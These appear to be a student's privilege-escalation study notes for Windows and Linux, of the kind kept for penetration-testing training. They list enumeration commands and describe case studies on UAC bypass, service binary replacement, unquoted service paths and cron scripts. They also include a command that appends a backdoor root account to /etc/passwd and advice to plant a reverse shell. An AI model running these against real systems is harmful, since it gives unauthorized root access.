Privilege Escalation

Elevate Privilege to root.

Information Gathering

Manual Enumeration

Enumerating Users

Identify high-privilege user

# Windows
whoami
net user <username>		# get more info about the user
net user			   # look at other users

# Linux
whoami
id					# get more details
cat /etc/passwd		 # view more users

Enumerating the Hostname

hostname		# display OS on linux

Enumerating the OS Version and Architecture

# Windows
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Linux
cat /etc/issue
cat /etc/*-release

uname -a 	# kernel version and architecture

Enumerating Running Processes and Services

# Windows
tasklist /SVC		

# Linux
ps axu

Enumerating Networking Information

# Windows
ipconfig /all
route print
netstat -ano		# a for all tcp, n for numeric form, o for owner process id

# Linux
ip a		# tcp/ip configuration
/sbin/route
ss -anp		# active network connection and listening port

Enumerating Firewall Status and Rules

# Windows
netsh advfirewall show currentprofile 
netsh advfirewall firewall show rule name=all		# show all firewall rules

# Linux
# must have root privileges to list firewall info
grep -Hs iptables /etc/*

Enumerating Schedules Tasks

# Windows
schtasks /query /fo LIST /v		# /query display tasks, /fo LIST to display output as list, /v for verbose output

# Linux
# cron
/etc/con.daily
/etc/con.weekly
cat /etc/crontab

Enumerating Installed Applications and Patch Levels

# Windows
wmic product get name, version, vendor		# only lists apps installed by windows installer
wmic qfe get Caption, Description, HotFixID, InstalledOn		# system-wide update

# Linux
dpkg -l

Enumerating Readable/Writable Files and Directories

# Windows
accesschk.exe -uws "Everyone" "C:\Program Files"

# Search for all files that can be modified by the member of the "Everyone" group
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

# Linux
# every directory writable to current user
find / -writable -type d 2>/dev/null

Enumerating Unmounted Disks

# Windows
mountvol		# list all mounted drives and connected but not mounted ones

# Linux
mount
cat /etc/fstab
/bin/lsblk

Enumerating Device Drivers and Kernel Modules

# Windows
powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

# get version number
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} 

# Linux
lsmod
/sbin/modinfo <specific driver>

After finding the versions of drivers, we can find exploits targeting the driver

Enumerating Binaries That AutoElevate

Reveal OS specific shortcuts to privilege escalation

# Windows
# check status of always installed elevated registry setting
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

# Linux
find / -perm -u=s -type f 2>/dev/null

Automated Enumeration

Manual Enumeration is very complicated.

# Windows
c:\Tools\privilege_escalation\windows-privesc-check-master>windows-privesc-check2.exe -h
windows-privesc-check2.exe --dump -G

# Linux
./unix-privesc-check
./unix-privesc-check standard output.txt
grep "writable config" -A 8 output.txt

Windows Privilege Escalation Examples

Understanding Windows Privileges and Integrity Levels

Windows use objects called Access Tokens to control the OS operation/permission a user can perform.

Introduction to User Account Control (UAC)

Access control system that forces applications to run in the context of a non-administrative account until an administrator authorize elevated access.

When a non-admin user tries to perform any operation that needs admin privileges, the user would be prompted with a credential.

An admin simply needs to confirm in the same scenario.

However, an admin has 2 different levels of integrity token. To do things like changing password, it is required for admin-user to switch to high integrity level.

whoami /group			# view integrity level
powershell.exe Start-Process cmd.exe -Verb runAs	# change integrity level

User Account Control Bypass: Case Study

C:\Windows\System32\fodhelper.exe: a microsoft support app that runs in high integrity, in charge of language changes in OS.

Goal: run command in high integrity.

View manifest (XML containing info about how OS should handle a program when it's started)

cd C:\Tools\privilege_escalation\SysinternalsSuite
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

...

Insecure File Permissions: Serviio Case Study

Installed applications has control of the permissions over its files.

If some service is readable/writable to all users or current user, then we can replace the service executable with some malicious code.

When service restarts, the malicious code is executed. If cannot restart, then shutdonw/restart the machine. The next time it boots up, the malicious code should be executed.

Maliciou code could be adding admin user.

Leveraging Unquoted Service Paths

If a path contains space and is not quoted, we could add a executable file in one of the intermediate directories to trick the system to execute is.

For example, C:\Program Files\My Program\My Service\service.exe

The path would be interpreted and executed in this order, if exists:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\service.exe

The target is to execute the fourth path, but if we can add My.exe to C:\Program Files\My Program as (3), then (3) would be executed first.

Windows Kernel Vulnerabilities: USBPcap Case Study

Relies on kernel driver vulnerability.

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"		# find system info
driverquery /v		# list drivers

Linux Privilege Escalation Examples

Understanding Linux Privileges

Most resources, such as files, directories, devices, network communications are represented as files in the file systems, and each file has 3 types of permissions: read, write and execute.

Insecure File Permissions: Cron Case Study

Inspect cron log for running jobs: grep "CRON" /var/log/cron.log

If some executable to be executed has unrestricted permissions, then we can modify the content of the script.

Add a reverse shell to the script.

Insecure File Permissions: /etc/passwd Case Study

If we can write to /etc/passwd, we can add an account.

openssl passwd evil

openssl passwd evil			# generate hash for password
# > 3ZpVEg3djUeto
# Then add the new account info in the right format to /etc/passwd
echo "root2:3ZpVEg3djUeto:0:0:root:/root:/bin/bash" >> /etc/passwd	# 0:0: are user and group ids, 0 means superuser
su root2		# switch user to verify if account is added
id			    # check user id and group id

Linux Kernel Vulnerabilities: Case Study

cat /etc/issue				# see message/system identification to be printed before login prompt
uname r					    # kernel
arch x86_64					# architecture

searchsploit linux kernel ubuntu 16.04			# search for existing exploits

Privilege Escalation

Information Gathering​

Manual Enumeration​

Enumerating Users​

Enumerating the OS Version and Architecture​

Enumerating Running Processes and Services​

Enumerating Networking Information​

Enumerating Firewall Status and Rules​

Enumerating Schedules Tasks​

Enumerating Installed Applications and Patch Levels​

Enumerating Readable/Writable Files and Directories​

Enumerating Unmounted Disks​

Enumerating Device Drivers and Kernel Modules​

Enumerating Binaries That AutoElevate​

Automated Enumeration​

Windows Privilege Escalation Examples​

Understanding Windows Privileges and Integrity Levels​

Introduction to User Account Control (UAC)​

User Account Control Bypass: Case Study​

View manifest (XML containing info about how OS should handle a program when it's started)​

Insecure File Permissions: Serviio Case Study​

Leveraging Unquoted Service Paths​

Windows Kernel Vulnerabilities: USBPcap Case Study​

Linux Privilege Escalation Examples​

Understanding Linux Privileges​

Insecure File Permissions: Cron Case Study​

Insecure File Permissions: /etc/passwd Case Study​

Linux Kernel Vulnerabilities: Case Study​